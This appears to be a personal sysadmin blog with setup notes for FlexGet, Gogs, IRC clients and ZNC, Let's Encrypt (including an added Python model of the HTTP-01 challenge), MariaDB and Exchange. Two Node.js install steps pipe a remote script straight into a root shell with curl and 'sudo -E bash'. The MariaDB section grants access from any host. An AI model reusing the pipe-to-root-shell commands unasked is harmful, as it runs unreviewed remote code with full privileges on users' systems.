<p>You can send the torrent directly to your rTorrent client by adding the lines below to the relevant <code>task</code>. You will find the <code>uri</code> in your <code>.rtorrent.rc</code> file.</p>
<div class="highlight"><pre><span></span><code><span class="nt">rtorrent</span><span class="p">:</span>
<span class="nt">uri</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">scgi://127.0.0.1:5000</span>
<span class="nt">path</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">/path/to/download_dir</span>
<span class="nt">custom1</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">label</span>
</code></pre></div>
<h2>Slack</h2>
<p>If you use Slack, you can enable the <code>Incoming Webhooks</code> feature on your Slack team (<a href="https://my.slack.com/services/new/incoming-webhook/">here</a>) and add the following lines to the relevant task:</p>
<div class="highlight"><pre><span></span><code><span class="nt">slack</span><span class="p">:</span>
<span class="nt">web_hook_url</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">https://hooks.slack.com/services/xxxxx/xxxxx/xxxxxxxxxx</span>
<span class="nt">username</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">flexget</span>
<span class="nt">icon_emoji</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">book</span>
</code></pre></div>
<p><code>username</code> and <code>icon_emoji</code> set the bot's name on the Slack channel and its avatar (from the list of emojis available on Slack).</p>
<h2>t411</h2>
<div class="highlight"><pre><span></span><code>flexget t411 add-auth username password
flexget t411 list-cats
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="nt">presse_t411</span><span class="p">:</span>
<span class="nt">priority</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">20</span>
<span class="nt">t411</span><span class="p">:</span>
<span class="nt">category</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Presse</span>
<span class="nt">regexp</span><span class="p">:</span>
<span class="nt">accept</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="s">"Pack</span><span class="nv"> </span><span class="s">Journaux"</span>
<span class="nt">only_new</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">yes</span>
<span class="nt">download</span><span class="p">:</span> <span class="s">"/tmp/"</span>
</code></pre></div>
<h1>Gogs</h1>
<p><em>nlegall, 2018-11-24</em></p>
<p><img alt="" src="https://img.nlegall.fr/eh15VGQk"></p>
<p><em>A painless self-hosted Git service.</em></p>
<h2>Installation</h2>
<div class="highlight"><pre><span></span><code>apt install git openssh-server mariadb-server
adduser -md /home/git git
su git
<span class="nb">cd</span> ~
wget https://dl.gogs.io/0.11.4/linux_amd64.tar.gz
tar zxvf linux_amd64.tar.gz
<span class="nb">cd</span> gogs
./gogs web
</code></pre></div>
<h2>Configuration</h2>
<div class="highlight"><pre><span></span><code><span class="err">#</span><span class="w"> </span><span class="n">vim</span><span class="w"> </span><span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">systemd</span><span class="o">/</span><span class="k">system</span><span class="o">/</span><span class="n">gogs</span><span class="p">.</span><span class="n">service</span><span class="w"></span>
<span class="o">[</span><span class="n">Unit</span><span class="o">]</span><span class="w"></span>
<span class="n">Description</span><span class="o">=</span><span class="n">Gogs</span><span class="w"> </span><span class="p">(</span><span class="k">Go</span><span class="w"> </span><span class="n">Git</span><span class="w"> </span><span class="n">Service</span><span class="p">)</span><span class="w"></span>
<span class="k">After</span><span class="o">=</span><span class="n">syslog</span><span class="p">.</span><span class="n">target</span><span class="w"></span>
<span class="k">After</span><span class="o">=</span><span class="n">network</span><span class="p">.</span><span class="n">target</span><span class="w"></span>
<span class="o">[</span><span class="n">Service</span><span class="o">]</span><span class="w"></span>
<span class="n">Type</span><span class="o">=</span><span class="n">simple</span><span class="w"></span>
<span class="k">User</span><span class="o">=</span><span class="n">git</span><span class="w"></span>
<span class="k">Group</span><span class="o">=</span><span class="n">git</span><span class="w"></span>
<span class="n">WorkingDirectory</span><span class="o">=/</span><span class="n">home</span><span class="o">/</span><span class="n">git</span><span class="o">/</span><span class="n">gogs</span><span class="w"></span>
<span class="n">ExecStart</span><span class="o">=/</span><span class="n">home</span><span class="o">/</span><span class="n">git</span><span class="o">/</span><span class="n">gogs</span><span class="o">/</span><span class="n">gogs</span><span class="w"> </span><span class="n">web</span><span class="w"></span>
<span class="n">Restart</span><span class="o">=</span><span class="n">always</span><span class="w"></span>
<span class="n">Environment</span><span class="o">=</span><span class="k">USER</span><span class="o">=</span><span class="n">git</span><span class="w"> </span><span class="n">HOME</span><span class="o">=/</span><span class="n">home</span><span class="o">/</span><span class="n">git</span><span class="w"></span>
<span class="o">[</span><span class="n">Install</span><span class="o">]</span><span class="w"></span>
<span class="n">WantedBy</span><span class="o">=</span><span class="n">multi</span><span class="o">-</span><span class="k">user</span><span class="p">.</span><span class="n">target</span><span class="w"></span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>systemctl <span class="nb">enable</span> gogs
systemctl start gogs
systemctl status gogs
</code></pre></div>
<h2>Migrating an SVN repository</h2>
<p>https://subgit.com/download.html</p>
<div class="highlight"><pre><span></span><code><span class="err">.\subgit.bat configure "file://kermene.fr/partages/010-UIS000/190-Nicolas Le Gall/KerESB" git</span>
<span class="err">.\subgit.bat install git</span>
</code></pre></div>
<h1>IRC</h1>
<p><em>nlegall, 2018-11-24</em></p>
<p>Internet Relay Chat, or IRC, is a text-based communication protocol on the Internet. It is used for instant communication, mainly as group discussions through discussion channels, but it can also be used for one-to-one communication. It can also be used for file transfer.</p>
<h1>Installing Kiwi IRC</h1>
<p>If you do not have Node.js installed:</p>
<div class="highlight"><pre><span></span><code>curl -sL https://deb.nodesource.com/setup_5.x <span class="p">|</span> sudo -E bash -
sudo apt-get install -y nodejs
</code></pre></div>
<div class="highlight"><pre><span></span><code>git clone https://github.com/prawnsalad/KiwiIRC.git <span class="o">&&</span> <span class="nb">cd</span> KiwiIRC
npm install
cp config.example.js config.js
vim config.js
./kiwi build
./kiwi start
http://serveurname:7778/
</code></pre></div>
<p>If you want to put Kiwi IRC behind a proxy so that it is served from a URL path or a subdomain:</p>
<div class="highlight"><pre><span></span><code><span class="k">location</span> <span class="s">/kiwi/</span> <span class="p">{</span>
<span class="kn">proxy_set_header</span> <span class="s">Host</span> <span class="nv">$host</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">X-Real-IP</span> <span class="nv">$remote_addr</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">x-forwarded-for</span> <span class="nv">$proxy_add_x_forwarded_for</span><span class="p">;</span>
<span class="kn">proxy_pass</span> <span class="s">http://localhost:7778/kiwi/</span><span class="p">;</span>
<span class="kn">proxy_redirect</span> <span class="s">default</span><span class="p">;</span>
<span class="c1"># Websocket support (from version 1.4)</span>
<span class="kn">proxy_http_version</span> <span class="mi">1</span><span class="s">.1</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">Upgrade</span> <span class="nv">$http_upgrade</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">Connection</span> <span class="s">"upgrade"</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>If you want a darker theme, you can install one by fetching the files from here: https://github.com/prawnsalad/KiwiIRC/pull/835</p>
<div class="highlight"><pre><span></span><code>mkdir KiwiIRC/client/assets/themes/morning
<span class="nb">cd</span> KiwiIRC/client/assets/themes/morning
wget https://raw.githubusercontent.com/xPaw/KiwiIRC/morning-theme/client/assets/themes/morning/theme.json
wget https://raw.githubusercontent.com/xPaw/KiwiIRC/morning-theme/client/assets/themes/morning/style.css
<span class="nb">cd</span> ../../../../
vim config.js
<span class="c1"># Add "'morning'," line 231</span>
</code></pre></div>
<h1>Installing The Lounge</h1>
<div class="highlight"><pre><span></span><code>curl -sL https://deb.nodesource.com/setup_4.x <span class="p">|</span> sudo -E bash -
sudo apt-get install -y nodejs
sudo npm install -g thelounge
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1">// vim /root/.lounge/config.js</span>
<span class="kr">public</span>
<span class="nx">host</span><span class="o">:</span> <span class="s2">"127.0.0.1"</span><span class="p">,</span>
<span class="nx">theme</span><span class="o">:</span> <span class="s2">"themes/zenburn.css"</span><span class="p">,</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>lounge add user
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1">// vim /root/.lounge/users/user.js</span>
<span class="p">{</span>
<span class="s2">"user"</span><span class="o">:</span> <span class="s2">"example"</span><span class="p">,</span>
<span class="s2">"password"</span><span class="o">:</span> <span class="s2">"password"</span><span class="p">,</span>
<span class="s2">"log"</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="s2">"networks"</span><span class="o">:</span> <span class="p">[{</span>
<span class="s2">"name"</span><span class="o">:</span> <span class="s2">"Freenode"</span><span class="p">,</span>
<span class="s2">"host"</span><span class="o">:</span> <span class="s2">"irc.freenode.net"</span><span class="p">,</span>
<span class="s2">"port"</span><span class="o">:</span> <span class="mi">6697</span><span class="p">,</span>
<span class="s2">"tls"</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="s2">"password"</span><span class="o">:</span> <span class="s2">"serverpw"</span><span class="p">,</span>
<span class="s2">"nick"</span><span class="o">:</span> <span class="s2">"john"</span><span class="p">,</span>
<span class="s2">"realname"</span><span class="o">:</span> <span class="s2">"John Doe"</span><span class="p">,</span>
<span class="s2">"commands"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"/msg NickServ identify password"</span><span class="p">,</span>
<span class="s2">"/msg ChanServ op #chan"</span>
<span class="p">],</span>
<span class="s2">"join"</span><span class="o">:</span> <span class="s2">"#foo, #bar"</span>
<span class="p">}]</span>
<span class="p">}</span>
</code></pre></div>
<h1>Installing a ZNC bouncer</h1>
<p><img alt="" src="https://img.nlegall.fr/MnAcwLi0"></p>
<p>ZNC is an IRC network bouncer or BNC. It can detach the client from the actual IRC server, and also from selected channels. Multiple clients from different locations can connect to a single ZNC account simultaneously and therefore appear under the same nickname on IRC. It supports SSL secured connections and IPv6.</p>
<h2>Operation without ZNC</h2>
<p><img alt="" src="https://img.nlegall.fr/cGKoJewp"></p>
<p>The client connects directly to the IRC server. If it disconnects, the client loses everything that happens until its next connection.</p>
<h2>Operation with ZNC</h2>
<p><img alt="" src="https://img.nlegall.fr/RpTqbnRD"></p>
<p>The client no longer connects directly to the IRC server but to ZNC, which is then the one directly connected to IRC. ZNC keeps all the content in memory and replays it to the user when they reconnect.</p>
<p>Download the latest source tarball</p>
<div class="highlight"><pre><span></span><code>wget http://znc.in/releases/znc-1.6.3.tar.gz
tar -xzvf znc*.*gz
<span class="nb">cd</span> znc*
./configure
make
make install
znc --makeconf
</code></pre></div>
<p><em>Configuration changes to improve security: force TLS and restrict the ciphers</em></p>
<div class="highlight"><pre><span></span><code><span class="c1"># Renew the certificate</span>
znc --makepem
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"># vim .znc/conf/znc.conf</span>
<span class="err">SSLProtocols = -SSLv2 -SSLv3 -TLSv1 +TLSv1.1 +TLSv1.2</span>
<span class="err">SSLCiphers = EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH</span>
</code></pre></div>
<h1>Hexchat</h1>
<div class="highlight"><pre><span></span><code>https://dl.hexchat.net/themes/Solarized%20Dark.hct
git clone https://github.com/hexchat/hexchat.git
<span class="nb">cd</span> hexchat
./autogen.sh
./configure --with-theme-manager
make <span class="o">&&</span> sudo make install
</code></pre></div>
Let's Encrypt 2018-11-24T10:20:00+01:00 2018-11-24T10:20:00+01:00 nlegall tag:blog.nlegall.fr,2018-11-24:/lets-encrypt.html
<p><em>It’s free, automated, and open</em></p>
<p><img alt="" src="https://img.nlegall.fr/2FHlW4NU"></p>
<p>Let's Encrypt is a certificate authority launched on 3 December 2015 (public beta). It provides free X.509 certificates for the TLS cryptographic protocol through an automated process meant to replace the current complex process of manually creating, validating, signing, installing and renewing certificates to secure websites.</p>
<h1>How it works</h1>
<p>The authority verifies the identity of the chosen domain by means of a public key. On first use for a domain, a key pair (private/public) is therefore generated. A known URL is then used to check the keys: Let's Encrypt places a file at that path, which the local agent signs with the private key generated earlier. The agent then notifies the authority that the file is signed and can be verified. The authority downloads the file and verifies both the signature and the content. If everything matches, it authorizes issuance of the certificate.</p>
<p><img alt="" src="https://img.nlegall.fr/odFCEK3S"></p>
<p><img alt="" src="https://img.nlegall.fr/JkkfdWHe"></p>
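<p>The following is an added example, not code from the original post: a stdlib-only Python model of the HTTP-01 exchange described above, with the agent writing the key authorization under the webroot and the authority checking what it fetched. The account key, token and file layout are constructed sample values.</p>

```python
import base64
import hashlib
import json
import os
import re
import tempfile


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWS and ACME require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


# Constructed sample account key (public part only): the modulus is a made-up
# 2048-bit number, not a real key. Only the JWK members matter for the thumbprint.
SAMPLE_ACCOUNT_JWK = {
    "kty": "RSA",
    "e": b64url((65537).to_bytes(3, "big")),
    "n": b64url(((1 << 2047) + 987654321).to_bytes(256, "big")),
}

# ACME tokens are base64url strings; refusing anything else also stops a
# hostile token such as "../../etc/passwd" from ever becoming a file path.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def jwk_thumbprint(jwk: dict) -> str:
    """RFC 7638 thumbprint: SHA-256 over the canonical JSON of the required
    public members only (keys sorted, no whitespace)."""
    required = {"RSA": ("e", "kty", "n"), "EC": ("crv", "kty", "x", "y")}
    canonical = json.dumps({k: jwk[k] for k in required[jwk["kty"]]},
                           sort_keys=True, separators=(",", ":"))
    return b64url(hashlib.sha256(canonical.encode("ascii")).digest())


def key_authorization(token: str, account_jwk: dict) -> str:
    """Content the agent must publish: <token>.<thumbprint of the account key>.
    The thumbprint ties the challenge to the key pair generated on first use."""
    return f"{token}.{jwk_thumbprint(account_jwk)}"


def agent_provision(webroot: str, token: str, account_jwk: dict) -> str:
    """Agent side: write the key authorization where the web server serves
    /.well-known/acme-challenge/<token> (the webroot authenticator layout)."""
    if not TOKEN_RE.match(token):
        raise ValueError("token is not base64url")
    challenge_dir = os.path.join(webroot, ".well-known", "acme-challenge")
    os.makedirs(challenge_dir, exist_ok=True)
    path = os.path.join(challenge_dir, token)
    with open(path, "w", encoding="ascii") as fh:
        fh.write(key_authorization(token, account_jwk))
    return path


def ca_validate(served_body: bytes, token: str, account_jwk: dict) -> bool:
    """CA side: the body fetched over plain HTTP on port 80 must equal the key
    authorization. Trailing whitespace is ignored (RFC 8555 section 8.3); any
    other difference, including a body built for another account key, fails."""
    expected = key_authorization(token, account_jwk).encode("ascii")
    return served_body.rstrip(b" \t\r\n") == expected


def round_trip(token: str = "evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA") -> bool:
    """End to end, with a file read standing in for the authority's HTTP fetch."""
    with tempfile.TemporaryDirectory() as webroot:
        path = agent_provision(webroot, token, SAMPLE_ACCOUNT_JWK)
        with open(path, "rb") as fh:
            body = fh.read()
    return ca_validate(body, token, SAMPLE_ACCOUNT_JWK)


if __name__ == "__main__":
    print("challenge validated:", round_trip())
```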
<h1>Setup</h1>
<p>The best way to get the client is to fetch it directly from their official GitHub repository. You will get the latest available stable version and can update it quickly with <code>git pull</code>.</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> /tmp
git clone https://github.com/letsencrypt/letsencrypt
<span class="nb">cd</span> letsencrypt
</code></pre></div>
<h1>Website</h1>
<p>It is recommended to stop your current web server (Apache2, nginx, lighttpd) before requesting the certificate. That lets the request go through without trouble (the standalone authenticator needs to bind the web port itself) and lets you edit the site configuration to add the generated certificate.</p>
<div class="highlight"><pre><span></span><code>./letsencrypt-auto certonly --rsa-key-size <span class="m">4096</span> -d domain.tld
</code></pre></div>
<h2>Nginx</h2>
<div class="highlight"><pre><span></span><code><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">443</span> <span class="s">ssl</span> <span class="s">default_server</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">my-domain</span><span class="p">;</span>
<span class="kn">ssl_certificate</span> <span class="s">/etc/letsencrypt/live/my-domain/fullchain.pem</span><span class="p">;</span>
<span class="kn">ssl_certificate_key</span> <span class="s">/etc/letsencrypt/live/my-domain/privkey.pem</span><span class="p">;</span>
<span class="kn">...</span>
<span class="err">}</span>
</code></pre></div>
<h1>Mail</h1>
<div class="highlight"><pre><span></span><code>./letsencrypt-auto certonly --rsa-key-size <span class="m">4096</span> -d mail.domain.tld --email contact@domain.tld --agree-tos
</code></pre></div>
<p><em>If your server handles several domain names, add all the other domains in the same form: <code>-d mail.domain2.tld</code>.</em></p>
<h2>Postfix</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">smtp_tls_CAfile = /etc/letsencrypt/live/mail.domain.tld/chain.pem</span>
<span class="err">smtpd_tls_cert_file = /etc/letsencrypt/live/mail.domain.tld/cert.pem</span>
<span class="err">smtpd_tls_key_file = /etc/letsencrypt/live/mail.domain.tld/privkey.pem</span>
</code></pre></div>
<h2>Dovecot</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/dovecot/conf.d/10-ssl.conf</span>
<span class="err">ssl_cert = &lt;/etc/letsencrypt/live/mail.domain.tld/fullchain.pem</span>
<span class="err">ssl_key = &lt;/etc/letsencrypt/live/mail.domain.tld/privkey.pem</span>
</code></pre></div>
<h1>Renouvellement automatique</h1>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/sh</span>
service nginx stop <span class="c1"># or whatever your webserver is</span>
/path/to/letsencrypt-auto renew -nvv --standalone > /var/log/letsencrypt/renew.log <span class="m">2</span>><span class="p">&</span><span class="m">1</span>
<span class="nv">LE_STATUS</span><span class="o">=</span><span class="nv">$?</span>
service nginx start <span class="c1"># or whatever your webserver is</span>
<span class="k">if</span> <span class="o">[</span> <span class="s2">"</span><span class="nv">$LE_STATUS</span><span class="s2">"</span> !<span class="o">=</span> <span class="m">0</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span>
<span class="nb">echo</span> Automated renewal failed:
cat /var/log/letsencrypt/renew.log
<span class="nb">exit</span> <span class="m">1</span>
<span class="k">fi</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># We use a 4096 bit RSA key instead of 2048</span>
<span class="na">rsa-key-size</span> <span class="o">=</span> <span class="s">4096</span>
<span class="na">email</span> <span class="o">=</span> <span class="s">mail@domain.tld</span>
<span class="na">domains</span> <span class="o">=</span> <span class="s">domain.tld,www.domain.tld</span>
<span class="na">authenticator</span> <span class="o">=</span> <span class="s">webroot</span>
<span class="c1"># This is the webroot directory of your domain in which</span>
<span class="c1"># letsencrypt will write a hash in /.well-known/acme-challenge directory.</span>
<span class="na">webroot-path</span> <span class="o">=</span> <span class="s">/var/www/letsencrypt/domain.tld/</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code># root must point at the same directory as the webroot-path above,
# so the challenge file is served from /.well-known/acme-challenge/
location /.well-known/acme-challenge/ {
    root /var/www/letsencrypt/domain.tld/;
    try_files $uri =404;
}
</code></pre></div>
Useful links 2018-11-24T10:20:00+01:00 2018-11-24T10:20:00+01:00 nlegall tag:blog.nlegall.fr,2018-11-24:/liens-utiles.html
<h1>SSL</h1>
<p>https://tls.imirhil.fr
https://www.ssllabs.com/ssltest/
https://observatory.mozilla.org/</p>
<h1>Check site</h1>
<p>https://webbkoll.dataskydd.net/en
https://report-uri.io/home/generate</p>
<h1>Images</h1>
<p>https://lut.im/</p>
<h1>Dev</h1>
<p>https://shields.io/#your-badge
https://www.browserleaks.com/</p>
<h1>Drivers</h1>
<p>https://sourceforge.net/projects/drvback/</p>
MariaDB/MySQL 2018-11-24T10:20:00+01:00 2018-11-24T10:20:00+01:00 nlegall tag:blog.nlegall.fr,2018-11-24:/mairadbmysql.html
<h1>Show the tables of a database</h1>
<div class="highlight"><pre><span></span><code><span class="k">SHOW</span> <span class="n">tables</span><span class="p">;</span>
</code></pre></div>
<h1>Show the columns (attributes) of a table</h1>
<div class="highlight"><pre><span></span><code><span class="k">DESC</span> <span class="k">table</span><span class="p">;</span>
</code></pre></div>
<h1>Create a database</h1>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">database_name</span><span class="p">;</span>
</code></pre></div>
<h1>Create a user and grant rights on a database</h1>
<div class="highlight"><pre><span></span><code>-- '%' accepts logins from any host; restrict it to the application host where possible
CREATE USER 'username'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON database_name.* TO 'username'@'%';
GRANT USAGE ON *.* TO 'username'@'%' IDENTIFIED BY 'password';
</code></pre></div>
<h1>Export a result to CSV</h1>
<div class="highlight"><pre><span></span><code><span class="k">SELECT</span> <span class="o">*</span>
<span class="k">INTO</span> <span class="n">OUTFILE</span> <span class="s1">'/tmp/output.csv'</span>
<span class="n">FIELDS</span> <span class="n">TERMINATED</span> <span class="k">BY</span> <span class="s1">','</span>
<span class="n">ENCLOSED</span> <span class="k">BY</span> <span class="s1">'"'</span>
<span class="n">ESCAPED</span> <span class="k">BY</span> <span class="s1">'\\'</span>
<span class="n">LINES</span> <span class="n">TERMINATED</span> <span class="k">BY</span> <span class="s1">'\n'</span>
<span class="k">FROM</span> <span class="n">tables</span><span class="p">;</span>
</code></pre></div>
Microsoft Exchange 2018-11-24T10:20:00+01:00 2018-11-24T10:20:00+01:00 nlegall tag:blog.nlegall.fr,2018-11-24:/microsoft-exchange.html
<p><img alt="" src="https://img.nlegall.fr/27dx79fr"></p>
<p>Global catalog: a copy of its own domain plus a partial, read-only copy of the other domains. One local copy per site is mandatory.</p>
<p>Prerequisites, in installation order:</p>
<ul>
<li>OS</li>
<li>IIS (all components checked)</li>
<li>UCMA</li>
<li>FilterPack</li>
<li>PowerShell script (RSAT and ADDS Tools)</li>
<li>Reboot</li>
<li>/PrepareAD (Schema Admins)</li>
<li>Mailbox (BAL) role FIRST, CAS afterwards</li>
</ul>
<h1>Rights</h1>
<ul>
<li>Local Administrators (OS and prerequisites)</li>
<li>Domain Admins (domain join)</li>
<li>Schema Admins (PrepareAD)</li>
<li>Enterprise Admins (role installation)</li>
</ul>
<h1>Server roles</h1>
<h2>Client Access server (CAS)</h2>
<ul>
<li>Client authentication</li>
<li>Routing, checking and filtering</li>
<li>Handling of client protocols</li>
<li>Handling of SMTP connections to the server</li>
<li>Offline address books</li>
<li>MailTips</li>
<li>Certificates</li>
</ul>
<h2>Mailbox server (BAL)</h2>
<ul>
<li>Databases</li>
<li>Transport rules (HUB)</li>
<li>Categorization</li>
<li>Unified Messaging</li>
<li>Public folders (mailbox)</li>
<li>AV and anti-spam protection</li>
</ul>
<h2>Edge server</h2>
<ul>
<li>AD LDS</li>
<li>SMTP relay</li>
<li>AV and anti-spam protection</li>
<li>Transport rules with SMTP connectors</li>
<li>Address rewriting</li>
</ul>
<h1>Versions</h1>
<h2>Exchange</h2>
<table>
<thead>
<tr>
<th>Edition</th>
<th>Components</th>
</tr>
</thead>
<tbody>
<tr>
<td>Standard</td>
<td>5 mailbox databases</td>
</tr>
<tr>
<td>Enterprise</td>
<td>50 mailbox databases</td>
</tr>
</tbody>
</table>
<h2>CAL</h2>
<table>
<thead>
<tr>
<th>Edition</th>
<th>Components</th>
</tr>
</thead>
<tbody>
<tr>
<td>Standard</td>
<td>Mail, calendar, OWA and ActiveSync</td>
</tr>
<tr>
<td>Enterprise</td>
<td>Mail, calendar, OWA, ActiveSync, Unified Messaging, journaling, Forefront...</td>
</tr>
</tbody>
</table>
<h1>Deployment scenarios</h1>
<ul>
<li>All Exchange roles on the same server</li>
<li>At least one server per role</li>
<li>Hybrid deployment</li>
</ul>
<h1>DNS</h1>
<p><img alt="" src="https://img.nlegall.fr/3a9Mk63m"></p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code><span class="nb">Install-WindowsFeature</span> <span class="n">AS-HTTP-Activation</span><span class="p">,</span><span class="n">NET-Framework</span><span class="p">-</span><span class="n">45-Features</span><span class="p">,</span><span class="n">Web-Mgmt-Console</span><span class="p">,</span><span class="n">WAS-Process-Model</span><span class="p">,</span><span class="n">Web-Asp-Net45</span><span class="p">,</span><span class="n">Web-Basic-Auth</span><span class="p">,</span><span class="n">Web-Client-Auth</span><span class="p">,</span><span class="n">Web-Digest-Auth</span><span class="p">,</span><span class="n">Web-Dir-Browsing</span><span class="p">,</span><span class="n">Web-Dyn-Compression</span><span class="p">,</span><span class="n">Web-Http-Errors</span><span class="p">,</span><span class="n">Web-Http-Logging</span><span class="p">,</span><span class="n">Web-Http-Redirect</span><span class="p">,</span><span class="n">Web-Http-Tracing</span><span class="p">,</span><span class="n">Web-ISAPI-Ext</span><span class="p">,</span><span class="n">Web-ISAPI-Filter</span><span class="p">,</span><span class="n">Web-Lgcy-Mgmt-Console</span><span class="p">,</span><span class="n">Web-Metabase</span><span class="p">,</span><span class="n">Web-Mgmt-Console</span><span class="p">,</span><span class="n">Web-Mgmt-Service</span><span class="p">,</span><span class="n">Web-Net-Ext45</span><span class="p">,</span><span class="n">Web-Request-Monitor</span><span class="p">,</span><span class="n">Web-Server</span><span class="p">,</span><span class="n">Web-Stat-Compression</span><span class="p">,</span><span class="n">Web-Static-Content</span><span class="p">,</span><span class="n">Web-Windows-Auth</span><span class="p">,</span><span class="n">Web-WMI</span><span class="p">,</span><span class="n">Windows-Identity-Foundation</span><span class="p">,</span><span class="n">RPC-over-HTTP-proxy</span><span class="p">,</span><span 
class="n">RSAT-Clustering</span><span class="p">,</span><span class="n">RSAT-Clustering-CmdInterface</span><span class="p">,</span><span class="n">RSAT-Clustering-Mgmt</span><span class="p">,</span><span class="n">RSAT-Clustering-PowerShell</span><span class="p">,</span><span class="n">Desktop-Experience</span>
<span class="nb">Install-WindowsFeature</span> <span class="n">RSAT-ADDS-Tools</span> <span class="n">RSAT-ADDS</span>
<span class="n">FilterPack64</span>
<span class="n">UcmaRuntimeSetup</span>
<span class="c"># Monter l'iso Exchange</span>
<span class="p">.\</span><span class="n">setup</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">PrepareAD</span> <span class="p">/</span><span class="n">IAcceptExchangeServerLicenceTerms</span> <span class="p">/</span><span class="n">OrganizationName</span><span class="err">:</span><span class="s2">"starwars"</span>
<span class="p">.\</span><span class="n">setup</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">role</span><span class="err">:</span><span class="n">MB</span> <span class="p">/</span><span class="n">IAcceptExchangeServerLicenceTerms</span>
<span class="p">.\</span><span class="n">setup</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">role</span><span class="err">:</span><span class="n">CA</span> <span class="p">/</span><span class="n">IAcceptExchangeServerLicenceTerms</span>
</code></pre></div>
<h1>Mailbox files</h1>
<ul>
<li>Database: edb</li>
<li>Transaction log: log</li>
<li>Checkpoint: chk</li>
<li>Temporary file: tmp.edb</li>
</ul>
<h1>Possible recipients</h1>
<ul>
<li>User mailboxes (internal)</li>
<li>Mail contacts</li>
<li>Mail users (external)</li>
<li>Public folders</li>
<li>Resource mailboxes</li>
<li>Shared mailboxes</li>
<li>Linked mailboxes</li>
<li>Remote mailboxes</li>
<li>Site mailboxes</li>
<li>Mail-enabled security and distribution groups (RBAC - delegation)</li>
<li>Global address list (LDAP query to the GC)</li>
</ul>
<h1><img alt="" src="https://img.nlegall.fr/glZQdNRf"> ActiveSync</h1>
<h2>How it works</h2>
<ol>
<li>An ActiveSync account is configured on a mobile device by entering an e-mail address and its password</li>
<li>DNS resolution to find the URL of the domain's Autodiscover service</li>
<li>The mobile device connects to the Autodiscover virtual directory</li>
<li>The Autodiscover service returns an XML response through the SSL firewall to set up synchronization</li>
</ol>
<h2>Features</h2>
<ul>
<li>Follow-up flags</li>
<li>Message grouping</li>
<li>SMS synchronization with Exchange</li>
<li>Remote wipe</li>
<li>Updates</li>
<li>Direct Push</li>
<li>Contact availability (free/busy) information</li>
<li>PIN reset</li>
</ul>
<h1>DAG (Database Availability Group)</h1>
<p><em>Group of databases for mailbox high availability.</em></p>
<p>A DAG replicates the databases selected in the console or via PowerShell. Failover between the two servers happens automatically through a witness server chosen when the DAG is created. A database can have at most 16 copies. Lagged copies (replay lag) are possible. A witness server (quorum) is mandatory.</p>
<p><img alt="" src="https://img.nlegall.fr/2bIIAqpM"></p>
<p><strong>A Mailbox server can belong to only one DAG at a time.</strong></p>
<h1>SSL</h1>
<ol>
<li>Generate the certificate request from the ECP console or PowerShell</li>
<li>Create the certificate with the root authority and retrieve it</li>
<li>Add the certificate to the Exchange request</li>
<li>Deploy the root certificate to all workstations</li>
<li>Select the new certificate in IIS</li>
</ol>
<h1>Message transport</h1>
<ul>
<li>MTA (Mail Transport Agent): server in charge of transporting mail; MTAs talk to each other over SMTP</li>
<li>MDA (Mail Delivery Agent): server in charge of storing incoming mail until the user comes to retrieve it</li>
<li>MUA (Mail User Agent): software installed on the user's system (mail client)</li>
</ul>
<p>Path of a message:</p>
<ol>
<li>Check of the accepted domains (Mailbox)</li>
<li>LDAP query to obtain the GUID (Mailbox / Outlook client)</li>
<li>Retrieval of the mail (HUB)</li>
<li>Transport to the Mailbox server hosting the database of the target mailbox (Mailbox)</li>
</ol>
<h2>SMTP</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>Definition</th>
</tr>
</thead>
<tbody>
<tr>
<td>HELO &lt;fqdn&gt;</td>
<td>identifies the sending server</td>
</tr>
<tr>
<td>MAIL FROM:&lt;sender&gt;</td>
<td>identifies the sender of the message</td>
</tr>
<tr>
<td>RCPT TO:&lt;recipient&gt;</td>
<td>identifies the recipient of the message</td>
